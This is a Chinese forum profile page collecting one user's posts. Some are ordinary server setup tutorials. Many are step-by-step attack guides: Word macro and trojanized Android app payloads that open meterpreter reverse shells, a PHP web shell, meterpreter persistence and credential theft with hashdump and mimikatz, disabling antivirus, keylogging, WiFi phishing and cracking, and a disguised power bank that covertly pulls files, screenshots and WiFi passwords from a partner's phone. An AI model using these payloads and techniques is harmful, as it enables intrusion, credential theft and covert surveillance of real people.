跳转到帖子

ISHACK AI BOT

Members
  • 注册日期

  • 上次访问

ISHACK AI BOT 发布的所有帖子

  1. REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。 环境centos7php7.1redis(4.2.0 我用了5.2.1的版本,最后安装并不成功,查了一下php7.1支持4.2.0。) 安装下载安装包 下载地址: http://pecl.php.net/package/redis wget -c http://pecl.php.net/get/redis-4.2.0.tgz 解压tar -zvxf redis-4.2.0.tgz用phpize生成configure配置文件 /usr/bin/phpize查看php-config 的路径 whereis php-configphp-config: /usr/bin/php-config /usr/share/man/man1/php-config.1.gz 编译安装./configure --with-php-config=/usr/bin/php-config make && make install出现下面情况说明安装成功 配置php.inivim /etc/php.ini在文件末尾添加extension=redis.so 最后重启服务器reboot 验证输入php -m查看是否有redis模块! 或者我们利用php探针查看是否有redis。
  2. nmap是渗透测试中最重要的神器之一。通过nmap扫描我们可以知道当前主机或者服务器开启了那些端口。通过开启的端口,便可进行下一步的渗透测试。当然,利用nmap我们可以扫面当前局域网中在线的设备。分析局域网中设备的安全性。 Ping扫描在nmap中提供了很多的扫描方式,其中ping就是最常用的一种方式。在扫描时只需要加入-sP就可以开启ping扫描。 nmap -sP 192.168.123.1/24 优点:不会返回太多无用的结果造成对结果的分析,并且比较高效。 缺点:部分设备有时扫不到,需多扫描几次。 无ping扫描ping扫描虽然简单,但是当开启了禁ping后,以上方法便行不通了。这时我们便可以用无ping扫描。 只需要添加参数-p0即可实现。 nmap -p0 192.168.123.1/24 优点:可避免防火墙的发现,可以详细的看到设备开启了那些端口。 缺点: 暂无 TCP Syn Ping扫描TCP Syn Ping即传输层的TCP/IP扫描,通过发送和接收报文的形式进行扫描,在这种情况下每个端口都会轻易的被发现。 命令: nmap -PS 192.168.123.1/24 优点:扫描更加精确 TCP ACK PING扫描很多防火墙会封锁SYN报文,所以nmap提供了SYN和ACK两种扫描方式,这两者的结合大大的提高了逃避防火墙的概率。 nmap -PA 192.168.123.1/24在实际中我们通常将 ps 和pa两个参数放到一起,这样效果会更好。 UDP扫描使用UDP扫描,nmap会发送一个空的报文到主机,如果返回则说明设备在线。通常我们只需要添加-PU即可实现udp扫描。 ARP扫描ARP扫描是nmap对目标进行一个apr ping扫描的过程,尤其在内网的情况下。因为在本地局域网防火墙是不会禁止ARP请求的。所以在内网中使用apr扫描时非常有效的。 nmap -PR 192.168.123.1/24 列表扫描列表扫描,他仅仅是列出制定网络上的每台主机,不发送任何报文给目标。 nmap -sL 192.168.123.1/24 优点:扫描速度相对来比较快。 缺点:会列出一些无用的信息。 反向域名解析nmap -R 192.168.123.1/24路由追踪使用--traceroute选项可以实现路由追踪,可以帮助用户了解网络通行的情况。 nmap --traceroute -v 192.168.123.1/24
  3. 网络钓鱼是我们日常最为常见的一种攻击手法,其目的是通过各种社会工程学的方法,让目标打开含有恶意代码的word excel ppt等文档。从而获取系统权限,本期教程来说说如何防御这种攻击! 首先我们利用msf生成vbsmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba 设置word新建一个word文档,文件另存为启用宏的word文档 然后开发工具——visual Basic 选择我们的项目ThisDocument双击打开,粘贴我们生成的shell。 保存完成后,配置msf。 msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST ip LHOST => 106.13.39.165 msf5 exploit(multi/handler) > set LPORT 5555 LPORT => 5555当目标运行word文档后,在msf中便会得到反弹!
  4. 首先来看看效果 代码<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>css3-scanner</title> <style> .qr-scanner { position: relative; height: 200px; width: 200px; margin: 0px auto;/*此处为了居中*/ background:url("er.jpg"); background-repeat: no-repeat; } .qr-scanner .box { width: 30vw; height: 30vw; max-height: 30vh; max-width: 30vh; position: relative; left: 50%; top: 50%; transform: translate(-50%, -50%); overflow: hidden; border: 0.1rem solid rgba(0, 255, 51, 0.2); } .qr-scanner .line { height: calc(100% - 2px); width: 100%; background: linear-gradient(180deg, rgba(0, 255, 51, 0) 43%, #00ff33 211%); border-bottom: 3px solid #00ff33; transform: translateY(-100%); animation: radar-beam 2s infinite; animation-timing-function: cubic-bezier(0.53, 0, 0.43, 0.99); animation-delay: 1.4s; } .qr-scanner .box:after, .qr-scanner .box:before, .qr-scanner .angle:after, .qr-scanner .angle:before { content: ''; display: block; position: absolute; width: 3vw; height: 3vw; border: 0.2rem solid transparent; } .qr-scanner .box:after, .qr-scanner .box:before { top: 0; border-top-color: #00ff33; } .qr-scanner .angle:after, .qr-scanner .angle:before { bottom: 0; border-bottom-color: #00ff33; } .qr-scanner .box:before, .qr-scanner .angle:before { left: 0; border-left-color: #00ff33; } .qr-scanner .box:after, .qr-scanner .angle:after { right: 0; border-right-color: #00ff33; } @keyframes radar-beam { 0% { transform: translateY(-100%); } 100% { transform: translateY(0); } } </style> </head> <body> <div class="qr-scanner"> <div class="box"> <div class="line"></div> <div class="angle"></div> </div> </div> </body> </html>
  5. 自kali更新到2020版后,默认取消了root用户的登录权限。只能用普通用户登录,这样做的优点在于对于kali的新手,在不懂的部分命令的情况下对系统的损害有所降低,也就说安全性提高了。但是普通用户权限实在太低,习惯了root权限的我们在2020中如何设置登录密码呢? 重启系统,进入下面这个界面时按E 按↓到linux开头的一行。 修改ro quiet splash为rw quiet splash init=/bin/ 按F10保存后进入单用户模式 执行passwd root命令修改密码 然后重启,便可以用root身份登录了!
  6. 在我们更新kali时,由于网络、断电、异常关机、或其他的人为因素导致kali更新没有完成。而直接关机,重启后发现界面黑屏只有一个光标闪动。此时怎么办呢? 解决方法同时按住ctrl+ALT+F2出现命令行登录窗口。 我们登录系统后再次执行apt-get upgrade查看提示,根据提示解决即可! 或者执行dpkg --configure -a即可完美解决
  7. 首先做一次简单的分析,本次CTF共两关,第一关为图片隐藏,第二关为https的暴力破解。总奖金池金额为166元,摄影小狂人贝贝获得第一名,JUST RUN获得第二名。首先恭喜两位了! 首先来看看战绩吧 当然,小伙伴们都顺利拿到了奖金。其余小伙伴瓜分的奖金! 奖金公布 CTF writeup访问:http://106.13.39.165:66/ 开局一张图 本题考查的是图片隐写 解题方法参考摄影狂人小贝贝的方法(因为太懒,我没写 ) CTF解题思路
  8. SG11即SourceGuardian安全组件,目前是PHP运用中较为重要和安全级别较高的安全组件。有一部分系统默认状态下未安装或启用SG11,而有的开源系统需要开启sg11才能安装使用,本教程教你如何安装PHP7.1的SG11。 下载 SG11百度云盘下载 提取码:bx6y 确定你的php版本在终端输入php -v查看当前版本 如我的版本是7.1那么更具我们的系统,复制对应的sg文件。 我的是7.1则复制ixed.7.1.lin到我的更目录 这里我为了方便,直接放在了root目录下。 即:/root/sg11/ixed.7.1.lin 配置php.ini命令: vim /etc/php.ini在里面增加一条: extension=/root/sg11/ixed.7.1.lin保存后重启服务器即可! 验证我们利用php探针查看,要是有SourceGuardian则说明安装成功!
  9. Usbrip(源自“USB Ripper”,而不是“USB RIP”惊人)是一个开源取证工具,带有CLI界面,可让您跟踪USB设备工件(即USB事件历史记录,“已连接”和“已断开连接”事件) Linux机器。 安装我们利用pip安装即可! pip install usbrip 示例usbrip events history -ql -n 100查询历史记录 如上图,在2020-03-20 02:25:59有个Android设备插入了USB。 这个是LINUX上查看USB的使用记录,那么在Windows下该怎么查看呢? 其实很简单,我们在cmd中执行下面命令即可: for /f %i in ('reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR') do @for /f %x in ('reg query "%i"') do @reg query "%x" /v FriendlyName | findstr FriendlyName
  10. 具有很多功能,包括元数据编辑器,SQL编辑器,丰富的数据编辑器,ERD,数据导出/导入/迁移/备份,SQL执行计划等。 基于Eclipse平台。使用插件架构,并为以下数据库提供附加功能:MySQL / MariaDB,PostgreSQL,Greenplum,Oracle,DB2 LUW,Exasol,SQL Server,Sybase / SAP ASE,SQLite,Firebird,H2,HSQLDB,Derby,Teradata,Vertica,Netezza,Informix等。 环境支持:需要安装Java环境 下载官网下载 使用 连接数据库 数据库-新建数据库 选择数据库的类型,连接即可! linux的安装下载.deb包,执行命令 dpkg -i xxx.deb即可完成安装!
  11. 随着Fluxion的更新,越来越多的小伙伴觉得Fluxion越来越不好玩了。变得越来越复杂,没有以前的旧版本简单实用。其实程序的更新是一件很好的事情,因为更新往往意味着解决以往的Bug,和全新的体验。NOW就让我们一起踩坑吧! 首先还是硬件方面: 在前面的几篇文章中,我经常提到。对于WiFi钓鱼推荐网卡型号为3070。这里我们不再多说。 关于Fluxion的安装 安装相对来说,还是很简单的,我们根据官方给出的安装文档安装即可。 git clone https://www.github.com/FluxionNetwork/fluxion.git cd fluxion ./fluxion.sh然而大多数人在这里常常安装失败,问题在于你的源有问题。kali如何更新源,请移步文章 《kali更新源》 如需手动安装模块,只需要执行apt-get install xxx后跟缺失的模块 这里我们以FLUXION 6.5 作为演示 在终端执行./fluxion.sh 选1 这时会分配你的无线网卡为监听模式,在新版中支持对5GWiFi的支持。 扫描周围的WiFi 按ctrl+c停止。 然而,在新版中最大的问题是在这里 很多人在这里就不会搞了,在旧版中fluxion会自动抓取WiFi的包,而新版中放弃了这个功能,需要我们收到抓。这门这里只需要填写我么抓到包的路劲即可。如/root/66.cap 其他的就和旧版一样了。 这里在填一个坑,有的小伙伴在最后一步建立钓鱼WiFi时会卡在开始建立钓鱼热点AP这是因为你的网卡问题,如8187的网卡就有这个毛病。
  12. 对于WIFI破解,总的来说方法就是那么几种。也没什么特别的技术含量。这么多年了,还是停留在以前陈旧的抓包破解的过程。也没有新的攻击方式,但是相信随着信息技术的发展。越来越多的技术漏洞也会说着披露。 启动fern wifi cracker在kali的菜单中,找到无线攻击模块,里面就有fern wifi cracker 选择无线网卡并扫描网络选择你的无线网卡wlan如果没有,则说明你的网卡不支持。 然后点击第二个,骚等片刻即可出现要攻击的WiFi。 这里扫描需要等待会儿 设置字典位置,开始破解。 总结相对来说,破解还是很简单的。纯属傻瓜式一步到位!破解的成功率也是依靠字典,所以比款工具仅仅适合新手入门!
  13. 本教程纯属虚构,里面涉及到的思路仅供吹牛。请勿非法使用,造成法律后果请自负! 什么是恶意充电宝 准备树莓派(虚拟机下没有尝试,因为需要安装手机的驱动。理论上应该也是可以的。)充电宝外壳(有条件的可以尝试利用3D打印,自己做一个外壳。) -数据线 安装ADB在树莓派中执行 apt-get install adb如果失败,请更新你的源为国内阿里云或中科大的源。 验证在终端中输入 adb如下,则证明安装完成。 配置手机在设置中开启 开发者选项—USB试调即可。 开始测试将手机和树莓派用数据线连接 这里提示是在充电,我们来看看在不知不觉中我们是如何进入手机的。 终端执行 adb devices 其中 34fb90f30704 device就是我们刚才连接的手机。 比如这时想指定 34fb90f30704 这个设备来运行 adb 命令获取屏幕分辨率: adb -s 34fb90f30704 shell wm size 显示手机中的所有应用adb shell pm list packages 其他命令参见列表 安装apk利用这个功能,我们可以把msf木马安装到我们的目标手机,方便我们测试! 命令格式: adb install [-lrtsdg] <path_to_apk>参数: adb install 后面可以跟一些可选参数来控制安装 APK 的行为,可用参数及含义如下: 如:adb install -g /root/11.apk 效果如下: 文件管理复制设备里的文件到电脑命令: adb pull <设备里的文件路径> [电脑上的目录]其中 电脑上的目录 参数可以省略,默认复制到当前目录。 例: adb pull /sdcard/sr.mp4 ~/tmp/小技巧:设备上的文件路径可能需要 root 权限才能访问,如果你的设备已经 root 过,可以先使用 adb shell 和 su 命令在 adb shell 里获取 root 权限后,先 cp /path/on/device /sdcard/filename 将文件复制到 sdcard,然后 adb pull /sdcard/filename /path/on/pc。 复制电脑里的文件到设备命令: adb push <电脑上的文件路径> <设备里的目录>例: adb push ~/sr.mp4 /sdcard/查看手机电池情况adb shell dumpsys battery 其中 scale 代表最大电量,level 代表当前电量。 屏幕截图感觉这个功能很实用,很隐蔽。 adb exec-out screencap -p > bbskali.png我们利用 vnc登录,查看效果。 录制屏幕录制屏幕以 mp4 格式保存到 /sdcard: adb shell screenrecord /sdcard/filename.mp4需要停止时按 Ctrl-C,默认录制时间和最长录制时间都是 180 秒。 如果需要导出到电脑: adb pull /sdcard/filename.mp4查看连接过的 WiFi 密码注:需要 root 权限。 命令: adb shell su cat /data/misc/wifi/*.conf利用这个命令,我们还可以看看女盆去过那个宾馆或酒店。毕竟都会默默的连WIFI 好了,其他的一些 adb命令,你们自己搜索去玩吧。这里不再演示了! 伪装现在最重要的问题是,如何让女盆把手机和树莓派连接。我这里的思路是将树莓派放到充电宝的盒子中,并且由充电宝为树莓派提供电源。 最后,找个外壳放到里面即可。
  14. AdGuard 是拥有可获取最佳网络冲浪体验所需全部功能的独特程序。其组合了世界上最高级的广告拦截器,隐私保护模块以及家长控制 - 可协同任何浏览器和应用工作。 在树莓派下安装wget https://static.adguard.com/adguardhome/release/AdGuardHome_linux_arm.tar.gz tar xvf AdGuardHome_linux_arm.tar.gz sudo ./AdGuardHome -s install一旦启动并运行,您可以在浏览器中输入以下内容,在端口3000上访问您的AdGuard Home Web界面 - http://192.168.10.20:3000/进行安装。 注意,如果你的的是VPS请在安全组中开启3000 80 等端口 接着下一步 设置web的端口,默认80这里我改成了81因为我本地80端口有web环境。为了避免冲突我改成了81。 设置管理员密码 到这里,我们就安装完成了,现在根据提示我们进行配置,我们这里以路由器为基础进行配置。 配置路由器登录路由器,在网络设置中修改DNS 这里将DNS修改为我们树莓派的ip 如果是电脑或者安卓手机,将dns改为127.0.0.1和树莓派ip 开始配置在浏览器中输入http://树莓派ip:81即可登录管理页面。 配置你的AdGuard在过滤——自定义过滤规则中添加我们的规则。 这里我们以屏蔽小米广告为例: ||douyin.com^ ||api.assistant.miui.com^$important ||d.douyin.com^$important ||s5.ssl.qhimg.com^$important ||hub5pr.sandai.net^$important ||sf0.market.xiaomi.com^$important @@||media.ptmi.gitv.tv^$important @@||broker.mqtt.pandora.xiaomi.com^$important @@||pandora.mi.com^$important @@||ott.io.mi.com^$important @@||mitv.tracking.miui.com^$important @@||ottimg.cdn.pandora.xiaomi.com^$important @@||gstat.ptmi.gitv.tv^$important @@||data.mistat.xiaomi.com^$important @@||image.box.xiaomi.com^$important点击应用即可。 如果你要屏蔽其他的网站,比如优酷、爱奇艺等,我们在查询日志中进行过滤即可。 为了使效果更佳,在设置—常规设置中将下面几项勾选。 效果 效果还是可以的。 发现好玩在过滤器-DNS重写中,我们可以利用此功能进行DNS劫持。所以没事不要乱蹭网哦!
  15. ServerStatus-Toyo版是一个酷炫高逼格的云探针、云监控、服务器云监控、多服务器探针 该探针又服务器端和客户端两方面构成,服务端只安装一个,客户端需要在监控的VPS上面安装。 一、服务器端安装登录服务器,下载脚本。 附件下载 下载完成后,上传到服务器。 在终端执行 status.sh s 需要注意的是,由于网络环境的问题,安装过程可能会失败。多尝试几次即可!!! 1.2设置端口这里默认回车即可(35601)需要注意的是,需要在安全组中放行改端口。 1.3 配置web由于我们的服务器已经配置好了web环境,所以这里我们选择N 然后,我们到宝塔或者Apache中新建虚拟主机,并且解析到目录/usr/local/ServerStatus/web 如上,看到如上所示,证明我们的服务端就安装完成。 1.4 验证在浏览器中输入你刚才解析的域名或者ip地址,要是能够访问探针页面,则说明安装成功。 安装客户端登录需要被监控的服务器 下载一键安装脚本(同服务器端脚本) 客户端脚本 2.1安装客户端在终端执行 status.sh c 按1选择安装客户端 2.2 输入服务器端的IP,或者服务器端配置的域名这里的ip地址或者域名为你的服务端的ip或者域名,如果你的客户端和服务器在同一服务器。默认127.0.0.1即可。 2.3 输入端口默认即可(要和服务端的端口一样) 2.4 为本台服务器添加客户端用户名及密码 保存好刚才设置的账号和密码,后面再服务端添加节点的时候要用。 这样,我们的客户端就安装和配置完成了。现在我们返回到服务端添加节点即可。 配置服务端登录服务器端所在服务器 输入 status.sh s选择7设置服务器配置 选择1添加节点 输入客户端设置的用户名和密码 设置一个服务器名称即可。 注意的是,这里除了刚才在配置客户端设置的账号和密码外,其他的默认即可! 所选的地点将会有国旗或者地区图标展示,当上传完web主题文件后,图标文件在/usr/local/ServerStatus/web/img/clients/下,请参照图标文件的文件名来填写此处的地点,例如香港填写HK,中国填写CN. 最终效果 美化web页面下载附件,覆盖/usr/local/ServerStatus/web/目录即可。 web附件下载 密码:此处内容需要评论回复后(审核通过)方可阅读。
  16. 本示例仅为学习研究所用,使用请准守《网络安全法》。造成一切后果,自行承担。本站不但任何责任!!! 前期的准备某路由器管理APP(luyou.apk)kali Linux手机(android 10) 01 生成Android shell在生成之前,确定本机的ip地址。 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.93 LPORT=5555 R > 66.apk这样我们便生成了一个名为66.apk的android shell 02 反编译刚才生成的shell和正常appapktool d 66.apk apktool d luyou.apk 反编译后的效果 03 注入PAYLOAD-1 进入luyou文件夹,打开AndroidManifest.xml文件 -2 搜索关键字Launch和Main找到所对应启动的smail文件,说白了就是找app启动文件路径 当前的启动路径为:com/mercury/mercuryrouterLaunchActivity 打开文件LaunchActivity.smali搜索onCreat函数,找到bundle对象,换行添加启动PAYLOAD代码: invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 04 将木马文件中的smali文件复制到载体smali文件夹中cp -r 66/smali/com/* luyou/smali/com/05添加权限打开木马AndroidManifest.xml文件 复制以<uses-permission android:name=.......> 开头的所有代码按照格式复制到载体luyou的AndroidManifest.xml文件中,删除重复权限就ok 06回遍apktool b luyou 07签名这样我们的app添加就算完成了,但是在手机是无法运行的。因为没有签名。 生成KEYSTORE: keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222签名: jarsigner -keystore mykey.keystore luyou.apk alias_name -s08 测试安装app msf终端成功上线
  17. 利用Python对mysql进行读写操作,创建数据库,插入数据,更新数据,删除数据等操作。 连接数据库#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #使用execute方法执行SQL语句 cursor.execute("SELECT VERSION()") #使用 fetchone() 方法获取一条数据 data = cursor.fetchone() print "Database version : %s " % data #关闭数据库连接 db.close()创建数据库表#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #如果数据表已经存在使用 execute() 方法删除表。 cursor.execute("DROP TABLE IF EXISTS EMPLOYEE") #创建数据表SQL语句 sql = """CREATE TABLE EMPLOYEE ( FIRST_NAME CHAR(20) NOT NULL, LAST_NAME CHAR(20), AGE INT, SEX CHAR(1), INCOME FLOAT )""" cursor.execute(sql) #关闭数据库连接 db.close()数据库插入操作#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #SQL 插入语句 sql = """INSERT INTO EMPLOYEE(FIRST_NAME, LAST_NAME, AGE, SEX, INCOME) VALUES ('Mac', 'Mohan', 20, 'M', 2000)""" try: #执行sql语句 cursor.execute(sql) #提交到数据库执行 db.commit() except: #Rollback in case there is any error db.rollback() #关闭数据库连接 db.close()数据库查询操作#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #SQL 查询语句 sql = "SELECT * FROM EMPLOYEE \ WHERE INCOME > %s" % (1000) try: #执行SQL语句 cursor.execute(sql) #获取所有记录列表 results = cursor.fetchall() for row in results: fname = row[0] lname = row[1] age = row[2] sex = row[3] income = row[4] #打印结果 print "fname=%s,lname=%s,age=%s,sex=%s,income=%s" % \ (fname, lname, age, sex, income ) except: print "Error: unable to fecth data" #关闭数据库连接 db.close()数据库更新操作#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #SQL 更新语句 sql = "UPDATE EMPLOYEE SET AGE = AGE + 1 WHERE SEX = '%c'" % ('M') try: #执行SQL语句 cursor.execute(sql) #提交到数据库执行 db.commit() except: #发生错误时回滚 db.rollback() #关闭数据库连接 db.close()删除操作#!/usr/bin/python #-*- coding: UTF-8 -*- import MySQLdb #打开数据库连接 db = MySQLdb.connect("localhost", "testuser", "test123", "TESTDB", charset='utf8' ) #使用cursor()方法获取操作游标 cursor = db.cursor() #SQL 删除语句 sql = "DELETE FROM EMPLOYEE WHERE AGE > %s" % (20) try: #执行SQL语句 cursor.execute(sql) #提交修改 db.commit() except: #发生错误时回滚 db.rollback() #关闭连接 db.close()
  18. 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 安装git clone https://github.com/tegal1337/Shelly cd Shelly pip install -r requirements.txt 安装模块 使用启动python3 shell.py生成一个shell python3 shell.py -g "kali" -p "88888" 分析代码<?php ($_GET['passwd'] == '888888') ? NULL : exit; system($_GET['c']); shell_exec($_GET['c']); ?>
  19. 持久化在msf生成的shell中,无论是是android还是windows在关闭软件或者设备重启后,我们的会话进程都会自然而然的关闭。要想得到会话,必须用户再次启动我们的shell才能得到会话。那么,我们该如何解决这一问题呢? msf/Windows持久化1、metsvc:通过服务启动,是 Meterpreter 下的一个脚本; 运行 run metsvc 将会在目标主机上以 Meterpreter 的服务的形式注册在服务列表中,并开机自动自动; 运行 run metsvc -r 卸载目标主机上的 Meterpreter 服务; 原理:设置的后门在目标机启动后会自动开启一个服务,等待连接;这个有点正向代理的意思,自己开个端口等待接入控制; 优点:命令简单,不必设置太多参数,即不需要设置反弹到的主机IP、端口等,直接 run metsvc -A; 缺点:如何其他人知道服务器的ip,都可以利用这个后门开启的服务来控制服务器【扫描器发现】; 2、persistence:通过启动项启动,也是 Meterpreter 下的一个脚本; 移除后门:删除注册表中的值和上传的 VBScript 文件,具体位置执行脚本后有提示。 原理:有点反向代理的意思; 优点:由于是主动献殷勤,目标机器上的防火墙对于此等操作一般均会放行,后门的存活率较高; 环境介绍vps(msf端口)win10 (受害者) 生成shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.100 LPORT=4444 -f exe > ~/root/bbskali.exe 配置msf msf exploit(handler) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.100 lhost => 192.168.43.100 msf exploit(handler) > exploit metsvc利用meterpreter > run metsvc [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:\Users\Go0s\AppData\Local\Temp\HLDIkkGKSJ... [*] >> Uploading metsrv.x86.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... Cannot open service manager (0x00000005)拿到 Meterpreter 会话,重新执行 run metsvc -A即可。 移除服务meterpreter > run metsvc -r利用 persistencemeterpreter > run persistence -U -i 10 -p 4444 -r 192.168.43.100重启目标机,仍然上线。 其脚本主要做的工作: ①、上传后门到目标机器【meterpreter的upload命令】; ②、再写自启动注册表【reg】; 移除根据执行脚本时提示的vbs文件和注册表位置,进行删除后门; Executing script C:\Users\Go0s\AppData\Local\Temp\SAaYfc.vbs Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\irZnsVkfdRUZIBandroid持久首先,我们生成android shell 并运行。如图,我们成功得到会话。 利用cd命令,切换到手机的根目录。 这里以小米手机为例: cd /storage/emulated/0 在此目录下,我们新建一个shell.sh文件,写入内容如下: 新建命令:edit shell.sh 内容: #!/bin/ while true do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity sleep 20 done输入:wq保存即可。 在终端执行shell--sh shell.sh 这样,我们就能得到持久的会话了!
  20. 关于msfconsolemsfconsole简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马。是出家旅行的必备神器,今天我们在一起来回顾下吧。 启动在终端执行 service postgresql start #启动postgresql 不启动也可以 msfconsole 常见的参数解读-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表) -e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload -a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64 –platform < platform> 指定payload的目标平台 -s, –space < length> 设定有效攻击荷载的最大长度,就是文件大小 -b, –bad-chars < list> 设定规避字符集,指定需要过滤的坏字符例如:不使用 '\x0f'、'\x00'; -i, –iterations < count> 指定payload的编码次数 -c, –add-code < path> 指定一个附加的win32 shellcode文件 -x, –template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中 -k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行 –payload-options 列举payload的标准选项 -o, –out < path> 指定创建好的payload的存放位置 -v, –var-name < name> 指定一个自定义的变量,以确定输出格式 –shellest 最小化生成payload -h, –help 查看帮助选项 –help-formats 查看msf支持的输出格式列表查看所有payloads--list payloads 使用msfvenom --list encoders可查看所有编码器 防止假session在实战中,经常会遇到假session或者刚连接就断开的情况,这里补充一些监听参数,防止假死与假session。 msf exploit(multi/handler) > set ExitOnSession false //可以在接收到seesion后继续监听端口,保持侦听。防止session意外退出msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0 默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0 msf5 exploit(multi/handler) > set SessionExpirationTimeout 0 默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭 handler后台持续监听msf exploit(multi/handler) > exploit -j -z使用exploit -j -z可在后台持续监听,-j为后台任务,-z为持续监听,使用Jobs命令查看和管理后台任务。jobs -K可结束所有任务。 还有种比较快捷的建立监听的方式,在msf下直接执行: msf5 > handler -H 192.168.0.93 -P 5555 -p windows/meterpreter/reverse_tcp 如上,我们同样得到了会话。 会话的持久化方式一:进程的迁移 查看当前shell的进程getid 查看目标运行的进程ps 如:我想将shell的进程变为 QQProtect.exe 的进程,执行migrate 3604即可。 方式二: 使用 espia use espia 获取凭证  在内网环境中,一个管理员可能管理多台服务器,他使用的密码有可能相同或者有规律,如果能够得到密码或者hash,再尝试登录内网其它服务器,可能取得意想不到的效果。 1.使用meterpreter的run hashdump命令 因为我电脑没有设置密码,所以这里没有hash信息 使用mimikatzload mimikatz载入模块 使用wdigest命令获取登录过的用户储存在内存里的明文密码。 操作文件系统1.文件的基本操作 ls:列出当前路径下的所有文件和文件夹。 pwd 或 getwd:查看当前路径。 search:搜索文件,使用search -h查看帮助。 cat:查看文件内容,比如cat test.txt。 edit:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。 rm:删除文件。 cd:切换路径。 mkdir:创建文件夹。 rmdir:删除文件夹。 getlwd 或 lpwd:查看自己系统的当前路径。 lcd:切换自己当前系统的目录。 lls:显示自己当前系统的所有文件和文件夹。 2.文件的上传和下载 (1) upload   格式:upload本地文件路径目标文件路径 (2)download 格式:download 目标文件路径 本地文件路径 其它操作1.关闭防病毒软件 run killav run post/windows/manage/killav2.操作远程桌面 run post/windows/manage/enable_rdp run post/windows/manage/enable_rdp username=test password=test添加远程桌面的用户(同时也会将该用户添加到管理员组)3.键盘记录 keyscan_start:开启键盘记录功能 keyscan_dump:显示捕捉到的键盘记录信息 keyscan_stop:停止键盘记录功能未完待续~??????
  21. zfaka,免费、安全、稳定、高效的发卡系统Github项目地址:https://github.com/zlkbdotnet/zfaka 注意:本篇文章适合已安装zfaka平台。 增加payjs支付方式payjs是一款适用于个人收款的微信收款解决方案,以前尝试过申请微信支付,但是门槛比较高。但是通过payjs可以轻松的解决此问题。需要注意的是,payjs认证需要300元,但是不要但是,老司机会给你发优惠码。便宜下来也就200元。(需要上车的小伙伴,下方留言即可!)基本生意下来本基本上就赚回来啦! 1.把附件Payjs下面的 三个文件夹payjs、payjswx、payjsalipay 上传到zfaka程序的`application\library\Pay 文件夹下。 附件 payjs下载 2.把tpl下面的文件 payjsalipay.html,payjswx.html 上传到application\modules\Admin\views\payment\tpl 下面 附件 tpl下载 3.登录服务器--登录数据库 mysql -u root -p use 数据库; INSERT INTO `t_payment` (`payment`, `payname`, `payimage`, `alias`, `sign_type`, `app_id`, `app_secret`, `ali_public_key`, `rsa_private_key`, `configure3`, `configure4`, `overtime`, `active`) VALUES ('PAYJS(微信)', '微信', '/res/images/pay/weixin.jpg', 'payjswx', 'MD5', '', '', NULL, NULL, '', '', 0, 0), ('PAYJS(支付宝)', '支付宝', '/res/images/pay/alipay.jpg', 'payjsalipay', 'MD5', '', '', NULL, NULL, '', '', 0, 0);注意:这里的数据库为你的zfaka的数据库。 4.登录zfaka的后台程序,就可以看到payjs设置参数。 附件解压密码:查看付费隐藏内容。
